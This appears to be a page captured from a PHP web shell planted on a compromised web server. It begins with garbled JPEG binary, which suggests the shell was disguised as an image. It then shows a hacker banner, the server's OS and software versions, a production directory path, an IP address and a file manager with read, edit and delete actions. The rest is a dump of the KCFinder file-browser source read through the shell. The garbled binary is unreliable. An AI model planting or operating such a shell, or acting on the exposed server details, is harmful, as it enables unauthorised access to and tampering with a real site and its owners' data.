JFIF       %%-))-969KKd       %%-))-969KKd! f%eK_.T  v_/n6q>e}&Cx@t7OuqySN%y%tz@ Un(quo{tS]\~LzǚPk;fϛϹ2y-=_z.NWW7DW@'4`3w3rr;hP8B%ַBe]`7Ҽo1e)弆O|4Wk*}7Su[9=U 9 |_+:@}@˵u@ g<4N<@=/ I(~}qq=y- u|. y'`3S+4$e= k4P]M^_Nou*R-,X0EI}m&LtVȱa|R\@ ʟ+YeIlY`XV^HV/c-eb du ̈́_2+DpV ` ^^->t7JydE]I 8:7#j̀iiVbp~o݃[}zwGF@-(RTJY@ Ty}X 1!2AQaq"3BR`r@PSb #4CTs0DU$EFcd?Lc4\K#E1$@CV8OƂZ5g;.141;%]6e laǃpv8)80D1ŌxLgWYc+z%:( w^PtdԣV Z:qDsh W) ͷ+~FO]"բ?eN 4)WREZ;T+}]:FRtI ѱއ>'s_[\qNhK ' ^qJv9 ]ʜ1FMzwF8ѯBIp-g`?si;|Hr%>jOh29-+-gQmBH?3P9e')>[k^OaxtLiS30ҿ6*o--I$ 1 z2+OЪ+i˺,_n3(~}StUMc \xSmGD0jMB06%') #1c6s/iaIɉgC%Yoi**MHЛ=rh ĭ總 E>Jў2+ct/^$[_kAOʕicR4qm#Lw!Squ/:e%~zMBfa|e7PUC|"/)CD\cy gڰF9(?\jU+>Cwl#>x^'a7C}LYX<@X`W8P hۂx͍q֜?de1qe* NDuTm-ߣ y+pUy*9aĺ:P4n$2&BTϵ@ a>v3uc,(uF0jˊ́a~32f2=ήZe[r!F !Bu)b FŌt%41N/֑41n1|> 1^;1=IĖEpq%"{/~M.QWDdUA6~z>kPh2Oi?Uc[`+l;՚':۾ږtoZjQ7\:Z3}~ &ڮRQH{mDq0TaM5i:5sC0x<]=Mp c!C<6]~vpxeH[AmY'iԖ_~ a(Ȕ@+a< w] wbk1#aD 9. ?p$ Qؒi-8S㨸f45t:ʙѾ.{mMshU1k\z^*#It@ v:%#iSZ.{.Vemm,Z3*;HtU8E.v'e ޴ 4WwLDe)jY*R'?wM֣ b+IfO('Y J$o޼ l.蕁~ Y Em>Y^m"r^4w}2PI7R1gV\wtVT׿w'*N{ZGN8qzrM/LO~ O~|ڞ櫮o{\dV斀AJmn E#HQg$!{XM'{u* 4O)>F.";l2z3IJ2?Fh7)rjrv@ AJlУ 0`StpGD&nƒpxΡ}P늿D@cEH҆2[9a}U/biEzu)xYR>߹q (yA~ُp \U\L\6~" U'>GJOP,ko:JGI*٢C8f8굟m#GV̐Cj]}N_]aJulE.+I&y5 6*TGHZRů}efjv"\3/3_hq՝g !ir,ܐv%~*lXccyo) 拏Qp_tT3!,Dur!CH7;9GQQmE:ÑCaƅ;zeij;d+% z#e%gdI9E5BB&۟S"=C(>{֠ ɫNUळiu>;P}حW]ouBmJS0ktRtDm+$ԫU_dq)$ ʃnLGSፑf'vlzP/_]QԂ]ȗ|W\;wTSf!m,ri{w了enP(`*.1i2.}e@;HA&_N᷸1|:Gjڒj~i/֬]1(N +^ bQq:›m*o5Y(.JPV[3ޭj֭j+i(uָ]kV)A/%X Fa?8'o>ꝣKks\_k)S%zDTRw#h#e#1Euk&,Yw+Ap"PIZ*j*Ug">m>|ڇ(#FXzCi9%J'H3Xwi-9s0S`R^֮ YLJz+q^i}i1jLK+ [ NzDSq[+Q'ݖl=s<[iIWz=%}[jɁ֠$$N7IUm83SVŭw)#0$g C26^ʓW<=B>{R)&繻8j3cbbce7TE1r\'}FūLO+KʢXm/=H 6FaRHI^Lȹ83g9CM93쑑nE)=q4I$s'ݠajm]"O>L4Vb;(eHm$֫ӆyYtYYr(<Ɠ2Fm "f֒;Tξu8jZR$b!E*9 yy+V:Dm Œ9@-f*l2#ٿPt#T҂ӵ&;AȃWlf xϜZكfj%bs ,/uN{,Gz*kkP M6f/0[I;S)ml-؉)~q9v`ǣ4gZJ}h&dﺥ#{}uDa7j(I'2OҒMF7 .Ey<$5;2ժTI %)TwG54Ŭ Kb6rG;uq\[8DJ'i$?Pq-ݗs\JGkYO2%}b\9;Tk⾜3%qSd( [O4i'jQՃ &F Ҧ T2!G{N j~:Cz J3|xd(6TZ a b5gfK\I)WYARA(RVE$G8at̖qWq{B:Q^g3QzcAZrH|GMcjb{+)r=>:de:¹[QOe@>ISP1nIq!:3G).!ŶB꠲#0Eb2"Lt4ƺKCGn9P=PeoX8@fղ Gi9k ^aHAV<)GG*k_aUΜWsX4ʷ\%m,W*F}<1E/&NJIʳ:PmeRuń%A<ᶧ2s^s-9$PHw]ZB#[>9Fm*>Ut.HugK9uaAF.%fW&J~$k^S:iގT9_5`_bR`ܒ(8Fa?jMc4Pŭ!VB7 W+߀ i>b٠,]?<{aXgpJ]璹نrV53-)p:,R%>#W۲4K{%L%]ͅP,7"[NI:ܴ- AJr)#"=k#Eoa PP$C>7m_t ڠcJZymA [qwDw|*3(FMۭ\KP-'1WK, suu;~ZaTnyi$A =46i֑AUU"l:gA ]"8&ד<{z&O!WF^XGhViWM\q(*p#Fk?p\Ym*J3B3'%jn+ IG{VcVL-f7 #/u}5bD7XMi!{#b$U]q\RGa ;OZXv^WZ\ܭ( lhSˎ6 V'h GY{49$r8AIȃ#V$HL/~l.]:>29:EkSO%N$Ϋkͯ⫝̸yˮ0mE+IVwuIu>Xj%6@[k)aqJz|؏!Υ֔RP.l@tⵅkZg'5nrqDU^kJBEBfrG)+J$"dB3#ٔk4yQCz9S\8'#/5cˑYO(4dhIM<6BߢJNDZFEgD6vnl|^kr;^hϨ1!ʌ:įZBᝋx|T+'!c t"YH=)"g6-t+.Ur$+ZzRG s*f9_QY4El>DI[}B=>v)iTg[?oWwۿlWG69k{Qx]-*$<-=W¹nUĂ}G4tZ]^Q8m!])SyR)vOR(_Aiϵei#{$hਧ.SLN}߬e}EgZwgAWPBcZÖ']P ;2/hy}1M9Fj'.ӖZy-,r ND|jlC)jqSʚV)]p3;❀[:tBH##HqhZr\j"tG-тtHtB24PJ:w;xI0$ wEQ#)FejK rSw|">Tҙ#2Xc8g,(L`S2 tM>5@<)A71iXSlHڛ9(y4KUu:xARdf5\Zq|m{ӭjI8%. ڟ5pxvqd(9P$#"8CQ NKFۘ;RTPE8^`WãRxL髍{}ġͭ緗Ҍ/<xcKOVy0\{Uk85A07)_uCuopN>~3e e޽ytYnDm3)ܠ&,![y3CcؽK+raޱX~aRbm<wE #+ԺQXfGq+h[71_A* [V٣sCEXb\fNiXNݔz NҲ wrG"+ kлYI`ϼUՄ o9Vc7^[Y"E]W>(GSkt]Gcx~hM`?WV8q w< `bJb̑ NNG[xr̈>Kþ7<7H56pIEKgoE`?4e)ޛ)7M(-4ot}LDG6"qycg~x{>8.,7W_ɦ/nG|MFU^VYpa",BBBH;GC#2JerK*ZIqbIphت݉)c繥ՅVtLnEcf62:;\Rw@{ S5Q $ϑTz;EzFO5Pn.NA<~ҌoXR|Ig$^]A|^_mmҷj8mbMbՅHmvI_MqƊFCq&Б%z>ΧKEAg4y;/0f[|@$SG,h5@0RȁцEH-qm%Kb%Dx:0XNHWIᰵ$G)|^ χ,m,#%6צIpO FDFUH5JKlI>Vxn;ĶY;dZkarnƭaeG< W#9+؄l?jEmDo<~W++0#π*<.ۘZ+H$VfF|J&#N ?*<<⢌՞\.#I: !#Sh-4'F |-[WQFH7 )d`JFCbFɞ9N9vՅW4xPOBHc2a"*90Iv5IGI<hI I*'Ƿ.-m1ȼѹKF2ٷ;*A*T6FDSKsipI tGx f$9 Ǐzf{kd@r:/?(i^b 3)_g;&IEWu̓*2t7qL Ti5, wdXr&Gwmŏy)IJD+iE:v6[=9ʰ;q` =}#q:<>~mFU631TqQ (t2/c~ iK'y˴TlxsF_$ {a8[yfc>Y͘k8&9x\Նڻ{I&7+ fv F=,ꌼcCA[c:麑î6B겦&|mFm㪈Rfw .xJês1?_UnuQGǪ?6wR5b-:q{wK  !1A2Qq"@PRa #03BCSbr4$T`c?K)o<rzѸUL<6K4F̘E¹?Q7 QZtʄSV9iE$m6vU>8_F!zaS# j_4Jzm_bȚ;/:Iq7A9Qڜp͖!QTaOSTQzqS5U{LHOWc;TWUA}YWqUNKURѾĴ:gfYnQ*dv?F6i1G6[H?W*!Wl 8OlE?U$jv<&Rا@TG"X޺51?Ikymc{TLʧA4Y+#a=[#j Ge;@֍Xًv_(uVgJjbէz;5$۱ʡ)zv|eS u̎b{ean<6\;CQ<@΍b{ZM%[*n,z{EZR++e`w޹bh9cWF2ǴU:RMWd架;UJcDtK_G@y5GāYzF 8cWb㖈qw4ecqMis,)',o=ߘq5e-0j.}xNGq?d;D5T Dbng2!zN%i`IJ4]JN Kv ./iLZFOii h=yn%wdԲ:d뉆2 ]|1jnvBV@XkxN_;J Kӯ$ΟVlXm x[0'id =qcamjdӚȹaE4rY26!۩PS#U v{-51~q<'x;Z *'Fg"pojg9l:5W媴txyyUU%`_58Mngv[+jz>XwbIt$]ɞ*{ &b^F=C4ЏZ+ F\pR]9c1b * @@K,\ϔ =0<9N{U^ozﺊ<˒D4p2 ,Ƿ˗:#]j*&*jFTܪTdF@x8׭CX2U&y({9b駴to90\DUaaƏ@J:tš#x]d0pUiJ!Џ_1Ke9s$\t%ZiW-]ZVp[!c8OڋGPmM 'ÈX$I"s)Ȍ[ڦT ׫wJsn$QӨ]dJ[;~ԕ$lŧt}7RU@&778ܷK "$4C^iQ􄆺h(Cg#P QҤ1 7~V=6~8:#7/N5qz=8ȂiEʀJpnx8.9@~1m3sE? :zqGY}:O#yw23$1%m}8`E毑s_PznQ[LF%D;S)י -YW < quTݪҒl>I£$qG,Ȑf=g + `~}m5dO+ipyOfv]ishu*8tx"4n7putfV]D`i=ZHWIwȩ<[.P\xӊF)jbKfzASi{*u#8 9p뚰 H@ff>,`2 L6b8 mw{Hn3|b3Fg1e6C<eH /_~B#L *t0xbS% 웞: Aɔ89hjd[OY墪9sŎzNZ:&Yiu%MGw=Y ]QӍ -u@'p[wK%suԘse^wbiɫ:f䲯4ֶCP JFE32 X;yVeAbFyyX%H ,vgb~Ksʊ&V φ 5f̅2K7ZVԎBLǑ=zv-yq,nȇ'(:8$(rH*!S RI.Lj"9\W>])|›\o?-tEs#678PI:e5n$i0ScudA F(ET lq{讬3 28xۆ1IPԲ v0r$0{[J*cyA 1OQ-3f5;׆!`;mV[g{*d$221VR8jk.aH)7c=BO>~ T77XӇʧ _NاVV:Gye)NKk Ǵ`ՏS=Wy\cu`}@8C2su XqC Պ̜xEU ڭ{$KόI@F؛NLOA$F[X2rĔG L\wE2J3S8IJ2e`A7),b +noĐ<{XA"Lj%W̮RI7=e0O {F 3t6ǽN7aNHmo!_5G/GGz`ǻwl${wzd2X,!a/@X{wh]S MARIJUANA
MARIJuANA
— DIOS — NO — CREA — NADA — EN — VANO —
Linux vps-ed8565de 5.10.0-32-cloud-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
  SOFT : Apache/2.4.65 (Debian) PHP : 7.4.33
/var/www/mdau-prod/kcfinder/core/
51.178.36.14

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
types dir drwxr-xr-x 2022-04-21 16:14 R D
.htaccess 0.049 KB -rw-r--r-- 2022-04-21 16:06 R E G D
autoload.php 6.322 KB -rw-r--r-- 2022-04-21 16:06 R E G D
browser.php 33.343 KB -rw-r--r-- 2022-04-21 16:06 R E G D
uploader.php 23.982 KB -rw-r--r-- 2022-04-21 16:06 R E G D
REQUEST EXIT
©TheAlmightyZeus
* @copyright 2010, 2011 KCFinder Project * @license http://www.opensource.org/licenses/gpl-2.0.php GPLv2 * @license http://www.opensource.org/licenses/lgpl-2.1.php LGPLv2 * @link http://kcfinder.sunhater.com */ class browser extends uploader { protected $action; protected $thumbsDir; protected $thumbsTypeDir; public function __construct() { parent::__construct(); if (isset($this->post['dir'])) { $dir = $this->checkInputDir($this->post['dir'], true, false); if ($dir === false) unset($this->post['dir']); $this->post['dir'] = $dir; } if (isset($this->get['dir'])) { $dir = $this->checkInputDir($this->get['dir'], true, false); if ($dir === false) unset($this->get['dir']); $this->get['dir'] = $dir; } $thumbsDir = $this->config['uploadDir'] . "/" . $this->config['thumbsDir']; if (( !is_dir($thumbsDir) && !@mkdir($thumbsDir, $this->config['dirPerms']) ) || !is_readable($thumbsDir) || !dir::isWritable($thumbsDir) || ( !is_dir("$thumbsDir/{$this->type}") && !@mkdir("$thumbsDir/{$this->type}", $this->config['dirPerms']) ) ) $this->errorMsg("Cannot access or create thumbnails folder."); $this->thumbsDir = $thumbsDir; $this->thumbsTypeDir = "$thumbsDir/{$this->type}"; // Remove temporary zip downloads if exists $files = dir::content($this->config['uploadDir'], array( 'types' => "file", 'pattern' => '/^.*\.zip$/i' )); if (is_array($files) && count($files)) { $time = time(); foreach ($files as $file) if (is_file($file) && ($time - filemtime($file) > 3600)) unlink($file); } if (isset($this->get['theme']) && ($this->get['theme'] == basename($this->get['theme'])) && is_dir("themes/{$this->get['theme']}") ) $this->config['theme'] = $this->get['theme']; } public function action() { $act = isset($this->get['act']) ? $this->get['act'] : "browser"; if (!method_exists($this, "act_$act")) $act = "browser"; $this->action = $act; $method = "act_$act"; if ($this->config['disabled']) { $message = $this->label("You don't have permissions to browse server."); if (in_array($act, array("browser", "upload")) || (substr($act, 0, 8) == "download") ) $this->backMsg($message); else { header("Content-Type: text/plain; charset={$this->charset}"); die(json_encode(array('error' => $message))); } } if (!isset($this->session['dir'])) $this->session['dir'] = $this->type; else { $type = $this->getTypeFromPath($this->session['dir']); $dir = $this->config['uploadDir'] . "/" . $this->session['dir']; if (($type != $this->type) || !is_dir($dir) || !is_readable($dir)) $this->session['dir'] = $this->type; } $this->session['dir'] = path::normalize($this->session['dir']); if ($act == "browser") { header("X-UA-Compatible: chrome=1"); header("Content-Type: text/html; charset={$this->charset}"); } elseif ( (substr($act, 0, 8) != "download") && !in_array($act, array("thumb", "upload")) ) header("Content-Type: text/plain; charset={$this->charset}"); $return = $this->$method(); echo ($return === true) ? '{}' : $return; } protected function act_browser() { if (isset($this->get['dir']) && is_dir("{$this->typeDir}/{$this->get['dir']}") && is_readable("{$this->typeDir}/{$this->get['dir']}") ) $this->session['dir'] = path::normalize("{$this->type}/{$this->get['dir']}"); return $this->output(); } protected function act_init() { $tree = $this->getDirInfo($this->typeDir); $tree['dirs'] = $this->getTree($this->session['dir']); if (!is_array($tree['dirs']) || !count($tree['dirs'])) unset($tree['dirs']); $files = $this->getFiles($this->session['dir']); $dirWritable = dir::isWritable("{$this->config['uploadDir']}/{$this->session['dir']}"); $data = array( 'tree' => &$tree, 'files' => &$files, 'dirWritable' => $dirWritable ); return json_encode($data); } protected function act_thumb() { $this->getDir($this->get['dir'], true); if (!isset($this->get['file']) || !isset($this->get['dir'])) $this->sendDefaultThumb(); $file = $this->get['file']; if (basename($file) != $file) $this->sendDefaultThumb(); $file = "{$this->thumbsDir}/{$this->type}/{$this->get['dir']}/$file"; if (!is_file($file) || !is_readable($file)) { $file = "{$this->config['uploadDir']}/{$this->type}/{$this->get['dir']}/" . basename($file); if (!is_file($file) || !is_readable($file)) $this->sendDefaultThumb($file); $image = new gd($file); if ($image->init_error) $this->sendDefaultThumb($file); $browsable = array(IMAGETYPE_GIF, IMAGETYPE_JPEG, IMAGETYPE_PNG); if (in_array($image->type, $browsable) && ($image->get_width() <= $this->config['thumbWidth']) && ($image->get_height() <= $this->config['thumbHeight']) ) { $type = ($image->type == IMAGETYPE_GIF) ? "gif" : ( ($image->type == IMAGETYPE_PNG) ? "png" : "jpeg"); $type = "image/$type"; httpCache::file($file, $type); } else $this->sendDefaultThumb($file); } httpCache::file($file, "image/jpeg"); } protected function act_expand() { return json_encode(array('dirs' => $this->getDirs($this->postDir()))); } protected function act_chDir() { $this->postDir(); // Just for existing check $this->session['dir'] = $this->type . "/" . $this->post['dir']; $dirWritable = dir::isWritable("{$this->config['uploadDir']}/{$this->session['dir']}"); return json_encode(array( 'files' => $this->getFiles($this->session['dir']), 'dirWritable' => $dirWritable )); } protected function act_newDir() { if (!$this->config['access']['dirs']['create'] || !isset($this->post['dir']) || !isset($this->post['newDir']) ) $this->errorMsg("Unknown error."); $dir = $this->postDir(); $newDir = $this->normalizeDirname(trim($this->post['newDir'])); if (!strlen($newDir)) $this->errorMsg("Please enter new folder name."); if (preg_match('/[\/\\\\]/s', $newDir)) $this->errorMsg("Unallowable characters in folder name."); if (substr($newDir, 0, 1) == ".") $this->errorMsg("Folder name shouldn't begins with '.'"); if (file_exists("$dir/$newDir")) $this->errorMsg("A file or folder with that name already exists."); if (!@mkdir("$dir/$newDir", $this->config['dirPerms'])) $this->errorMsg("Cannot create {dir} folder.", array('dir' => $newDir)); return true; } protected function act_renameDir() { if (!$this->config['access']['dirs']['rename'] || !isset($this->post['dir']) || !isset($this->post['newName']) ) $this->errorMsg("Unknown error."); $dir = $this->postDir(); $newName = $this->normalizeDirname(trim($this->post['newName'])); if (!strlen($newName)) $this->errorMsg("Please enter new folder name."); if (preg_match('/[\/\\\\]/s', $newName)) $this->errorMsg("Unallowable characters in folder name."); if (substr($newName, 0, 1) == ".") $this->errorMsg("Folder name shouldn't begins with '.'"); if (!@rename($dir, dirname($dir) . "/$newName")) $this->errorMsg("Cannot rename the folder."); $thumbDir = "$this->thumbsTypeDir/{$this->post['dir']}"; if (is_dir($thumbDir)) @rename($thumbDir, dirname($thumbDir) . "/$newName"); return json_encode(array('name' => $newName)); } protected function act_deleteDir() { if (!$this->config['access']['dirs']['delete'] || !isset($this->post['dir']) || !strlen(trim($this->post['dir'])) ) $this->errorMsg("Unknown error."); $dir = $this->postDir(); if (!dir::isWritable($dir)) $this->errorMsg("Cannot delete the folder."); $result = !dir::prune($dir, false); if (is_array($result) && count($result)) $this->errorMsg("Failed to delete {count} files/folders.", array('count' => count($result))); $thumbDir = "$this->thumbsTypeDir/{$this->post['dir']}"; if (is_dir($thumbDir)) dir::prune($thumbDir); return true; } protected function act_upload() { if (!$this->config['access']['files']['upload'] || !isset($this->post['dir']) ) $this->errorMsg("Unknown error."); $dir = $this->postDir(); if (!dir::isWritable($dir)) $this->errorMsg("Cannot access or write to upload folder."); if (is_array($this->file['name'])) { $return = array(); foreach ($this->file['name'] as $i => $name) { $return[] = $this->moveUploadFile(array( 'name' => $name, 'tmp_name' => $this->file['tmp_name'][$i], 'error' => $this->file['error'][$i] ), $dir); } return implode("\n", $return); } else return $this->moveUploadFile($this->file, $dir); } protected function act_download() { $dir = $this->postDir(); if (!isset($this->post['dir']) || !isset($this->post['file']) || (false === ($file = "$dir/{$this->post['file']}")) || !file_exists($file) || !is_readable($file) ) $this->errorMsg("Unknown error."); header("Pragma: public"); header("Expires: 0"); header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); header("Cache-Control: private", false); header("Content-Type: application/octet-stream"); header('Content-Disposition: attachment; filename="' . str_replace('"', "_", $this->post['file']) . '"'); header("Content-Transfer-Encoding:­ binary"); header("Content-Length: " . filesize($file)); readfile($file); die; } protected function act_rename() { $dir = $this->postDir(); if (!$this->config['access']['files']['rename'] || !isset($this->post['dir']) || !isset($this->post['file']) || !isset($this->post['newName']) || (false === ($file = "$dir/{$this->post['file']}")) || !file_exists($file) || !is_readable($file) || !file::isWritable($file) ) $this->errorMsg("Unknown error."); if (isset($this->config['denyExtensionRename']) && $this->config['denyExtensionRename'] && (file::getExtension($this->post['file'], true) !== file::getExtension($this->post['newName'], true) ) ) $this->errorMsg("You cannot rename the extension of files!"); $newName = $this->normalizeFilename(trim($this->post['newName'])); if (!strlen($newName)) $this->errorMsg("Please enter new file name."); if (preg_match('/[\/\\\\]/s', $newName)) $this->errorMsg("Unallowable characters in file name."); if (substr($newName, 0, 1) == ".") $this->errorMsg("File name shouldn't begins with '.'"); $newName = "$dir/$newName"; if (file_exists($newName)) $this->errorMsg("A file or folder with that name already exists."); $ext = file::getExtension($newName); if (!$this->validateExtension($ext, $this->type)) $this->errorMsg("Denied file extension."); if (!@rename($file, $newName)) $this->errorMsg("Unknown error."); $thumbDir = "{$this->thumbsTypeDir}/{$this->post['dir']}"; $thumbFile = "$thumbDir/{$this->post['file']}"; if (file_exists($thumbFile)) @rename($thumbFile, "$thumbDir/" . basename($newName)); return true; } protected function act_delete() { $dir = $this->postDir(); if (!$this->config['access']['files']['delete'] || !isset($this->post['dir']) || !isset($this->post['file']) || (false === ($file = "$dir/{$this->post['file']}")) || !file_exists($file) || !is_readable($file) || !file::isWritable($file) || !@unlink($file) ) $this->errorMsg("Unknown error."); $thumb = "{$this->thumbsTypeDir}/{$this->post['dir']}/{$this->post['file']}"; if (file_exists($thumb)) @unlink($thumb); return true; } protected function act_cp_cbd() { $dir = $this->postDir(); if (!$this->config['access']['files']['copy'] || !isset($this->post['dir']) || !is_dir($dir) || !is_readable($dir) || !dir::isWritable($dir) || !isset($this->post['files']) || !is_array($this->post['files']) || !count($this->post['files']) ) $this->errorMsg("Unknown error."); $error = array(); foreach($this->post['files'] as $file) { $file = path::normalize($file); if (substr($file, 0, 1) == ".") continue; $type = explode("/", $file); $type = $type[0]; if ($type != $this->type) continue; $path = "{$this->config['uploadDir']}/$file"; $base = basename($file); $replace = array('file' => $base); $ext = file::getExtension($base); if (!file_exists($path)) $error[] = $this->label("The file '{file}' does not exist.", $replace); elseif (substr($base, 0, 1) == ".") $error[] = "$base: " . $this->label("File name shouldn't begins with '.'"); elseif (!$this->validateExtension($ext, $type)) $error[] = "$base: " . $this->label("Denied file extension."); elseif (file_exists("$dir/$base")) $error[] = "$base: " . $this->label("A file or folder with that name already exists."); elseif (!is_readable($path) || !is_file($path)) $error[] = $this->label("Cannot read '{file}'.", $replace); elseif (!@copy($path, "$dir/$base")) $error[] = $this->label("Cannot copy '{file}'.", $replace); else { if (function_exists("chmod")) @chmod("$dir/$base", $this->config['filePerms']); $fromThumb = "{$this->thumbsDir}/$file"; if (is_file($fromThumb) && is_readable($fromThumb)) { $toThumb = "{$this->thumbsTypeDir}/{$this->post['dir']}"; if (!is_dir($toThumb)) @mkdir($toThumb, $this->config['dirPerms'], true); $toThumb .= "/$base"; @copy($fromThumb, $toThumb); } } } if (count($error)) return json_encode(array('error' => $error)); return true; } protected function act_mv_cbd() { $dir = $this->postDir(); if (!$this->config['access']['files']['move'] || !isset($this->post['dir']) || !is_dir($dir) || !is_readable($dir) || !dir::isWritable($dir) || !isset($this->post['files']) || !is_array($this->post['files']) || !count($this->post['files']) ) $this->errorMsg("Unknown error."); $error = array(); foreach($this->post['files'] as $file) { $file = path::normalize($file); if (substr($file, 0, 1) == ".") continue; $type = explode("/", $file); $type = $type[0]; if ($type != $this->type) continue; $path = "{$this->config['uploadDir']}/$file"; $base = basename($file); $replace = array('file' => $base); $ext = file::getExtension($base); if (!file_exists($path)) $error[] = $this->label("The file '{file}' does not exist.", $replace); elseif (substr($base, 0, 1) == ".") $error[] = "$base: " . $this->label("File name shouldn't begins with '.'"); elseif (!$this->validateExtension($ext, $type)) $error[] = "$base: " . $this->label("Denied file extension."); elseif (file_exists("$dir/$base")) $error[] = "$base: " . $this->label("A file or folder with that name already exists."); elseif (!is_readable($path) || !is_file($path)) $error[] = $this->label("Cannot read '{file}'.", $replace); elseif (!file::isWritable($path) || !@rename($path, "$dir/$base")) $error[] = $this->label("Cannot move '{file}'.", $replace); else { if (function_exists("chmod")) @chmod("$dir/$base", $this->config['filePerms']); $fromThumb = "{$this->thumbsDir}/$file"; if (is_file($fromThumb) && is_readable($fromThumb)) { $toThumb = "{$this->thumbsTypeDir}/{$this->post['dir']}"; if (!is_dir($toThumb)) @mkdir($toThumb, $this->config['dirPerms'], true); $toThumb .= "/$base"; @rename($fromThumb, $toThumb); } } } if (count($error)) return json_encode(array('error' => $error)); return true; } protected function act_rm_cbd() { if (!$this->config['access']['files']['delete'] || !isset($this->post['files']) || !is_array($this->post['files']) || !count($this->post['files']) ) $this->errorMsg("Unknown error."); $error = array(); foreach($this->post['files'] as $file) { $file = path::normalize($file); if (substr($file, 0, 1) == ".") continue; $type = explode("/", $file); $type = $type[0]; if ($type != $this->type) continue; $path = "{$this->config['uploadDir']}/$file"; $base = basename($file); $replace = array('file' => $base); if (!is_file($path)) $error[] = $this->label("The file '{file}' does not exist.", $replace); elseif (!@unlink($path)) $error[] = $this->label("Cannot delete '{file}'.", $replace); else { $thumb = "{$this->thumbsDir}/$file"; if (is_file($thumb)) @unlink($thumb); } } if (count($error)) return json_encode(array('error' => $error)); return true; } protected function act_downloadDir() { $dir = $this->postDir(); if (!isset($this->post['dir']) || $this->config['denyZipDownload']) $this->errorMsg("Unknown error."); $filename = basename($dir) . ".zip"; do { $file = md5(time() . session_id()); $file = "{$this->config['uploadDir']}/$file.zip"; } while (file_exists($file)); new zipFolder($file, $dir); header("Content-Type: application/x-zip"); header('Content-Disposition: attachment; filename="' . str_replace('"', "_", $filename) . '"'); header("Content-Length: " . filesize($file)); readfile($file); unlink($file); die; } protected function act_downloadSelected() { $dir = $this->postDir(); if (!isset($this->post['dir']) || !isset($this->post['files']) || !is_array($this->post['files']) || $this->config['denyZipDownload'] ) $this->errorMsg("Unknown error."); $zipFiles = array(); foreach ($this->post['files'] as $file) { $file = path::normalize($file); if ((substr($file, 0, 1) == ".") || (strpos($file, '/') !== false)) continue; $file = "$dir/$file"; if (!is_file($file) || !is_readable($file)) continue; $zipFiles[] = $file; } do { $file = md5(time() . session_id()); $file = "{$this->config['uploadDir']}/$file.zip"; } while (file_exists($file)); $zip = new ZipArchive(); $res = $zip->open($file, ZipArchive::CREATE); if ($res === TRUE) { foreach ($zipFiles as $cfile) $zip->addFile($cfile, basename($cfile)); $zip->close(); } header("Content-Type: application/x-zip"); header('Content-Disposition: attachment; filename="selected_files_' . basename($file) . '"'); header("Content-Length: " . filesize($file)); readfile($file); unlink($file); die; } protected function act_downloadClipboard() { if (!isset($this->post['files']) || !is_array($this->post['files']) || $this->config['denyZipDownload'] ) $this->errorMsg("Unknown error."); $zipFiles = array(); foreach ($this->post['files'] as $file) { $file = path::normalize($file); if ((substr($file, 0, 1) == ".")) continue; $type = explode("/", $file); $type = $type[0]; if ($type != $this->type) continue; $file = $this->config['uploadDir'] . "/$file"; if (!is_file($file) || !is_readable($file)) continue; $zipFiles[] = $file; } do { $file = md5(time() . session_id()); $file = "{$this->config['uploadDir']}/$file.zip"; } while (file_exists($file)); $zip = new ZipArchive(); $res = $zip->open($file, ZipArchive::CREATE); if ($res === TRUE) { foreach ($zipFiles as $cfile) $zip->addFile($cfile, basename($cfile)); $zip->close(); } header("Content-Type: application/x-zip"); header('Content-Disposition: attachment; filename="clipboard_' . basename($file) . '"'); header("Content-Length: " . filesize($file)); readfile($file); unlink($file); die; } protected function act_check4Update() { if ($this->config['denyUpdateCheck']) return json_encode(array('version' => false)); // Caching HTTP request for 6 hours if (isset($this->session['checkVersion']) && isset($this->session['checkVersionTime']) && ((time() - $this->session['checkVersionTime']) < 21600) ) return json_encode(array('version' => $this->session['checkVersion'])); $protocol = "http"; $host = "kcfinder.sunhater.com"; $port = 80; $path = "/checkVersion.php"; $url = "$protocol://$host:$port$path"; $pattern = '/^\d+\.\d+$/'; $responsePattern = '/^[A-Z]+\/\d+\.\d+\s+\d+\s+OK\s*([a-zA-Z0-9\-]+\:\s*[^\n]*\n)*\s*(.*)\s*$/'; // file_get_contents() if (ini_get("allow_url_fopen") && (false !== ($ver = file_get_contents($url))) && preg_match($pattern, $ver) // HTTP extension ) {} elseif ( function_exists("http_get") && (false !== ($ver = @http_get($url))) && ( ( preg_match($responsePattern, $ver, $match) && false !== ($ver = $match[2]) ) || true ) && preg_match($pattern, $ver) // Curl extension ) {} elseif ( function_exists("curl_init") && (false !== ( $curl = @curl_init($url) )) && ( @ob_start() || (@curl_close($curl) && false)) && ( @curl_exec($curl) || (@curl_close($curl) && false)) && ((false !== ( $ver = @ob_get_clean() )) || (@curl_close($curl) && false)) && ( @curl_close($curl) || true ) && preg_match($pattern, $ver) // Socket extension ) {} elseif (function_exists('socket_create')) { $cmd = "GET $path " . strtoupper($protocol) . "/1.1\r\n" . "Host: $host\r\n" . "Connection: Close\r\n\r\n"; if ((false !== ( $socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP) )) && (false !== @socket_connect($socket, $host, $port) ) && (false !== @socket_write($socket, $cmd, strlen($cmd)) ) && (false !== ( $ver = @socket_read($socket, 2048) )) && preg_match($responsePattern, $ver, $match) ) $ver = $match[2]; if (isset($socket) && is_resource($socket)) @socket_close($socket); } if (isset($ver) && preg_match($pattern, $ver)) { $this->session['checkVersion'] = $ver; $this->session['checkVersionTime'] = time(); return json_encode(array('version' => $ver)); } else return json_encode(array('version' => false)); } protected function moveUploadFile($file, $dir) { $message = $this->checkUploadedFile($file); if ($message !== true) { if (isset($file['tmp_name'])) @unlink($file['tmp_name']); return "{$file['name']}: $message"; } $filename = $this->normalizeFilename($file['name']); $target = "$dir/" . file::getInexistantFilename($filename, $dir); if (!@move_uploaded_file($file['tmp_name'], $target) && !@rename($file['tmp_name'], $target) && !@copy($file['tmp_name'], $target) ) { @unlink($file['tmp_name']); return "{$file['name']}: " . $this->label("Cannot move uploaded file to target folder."); } elseif (function_exists('chmod')) chmod($target, $this->config['filePerms']); $this->makeThumb($target); return "/" . basename($target); } protected function sendDefaultThumb($file=null) { if ($file !== null) { $ext = file::getExtension($file); $thumb = "themes/{$this->config['theme']}/img/files/big/$ext.png"; } if (!isset($thumb) || !file_exists($thumb)) $thumb = "themes/{$this->config['theme']}/img/files/big/..png"; header("Content-Type: image/png"); readfile($thumb); die; } protected function getFiles($dir) { $thumbDir = "{$this->config['uploadDir']}/{$this->config['thumbsDir']}/$dir"; $dir = "{$this->config['uploadDir']}/$dir"; $return = 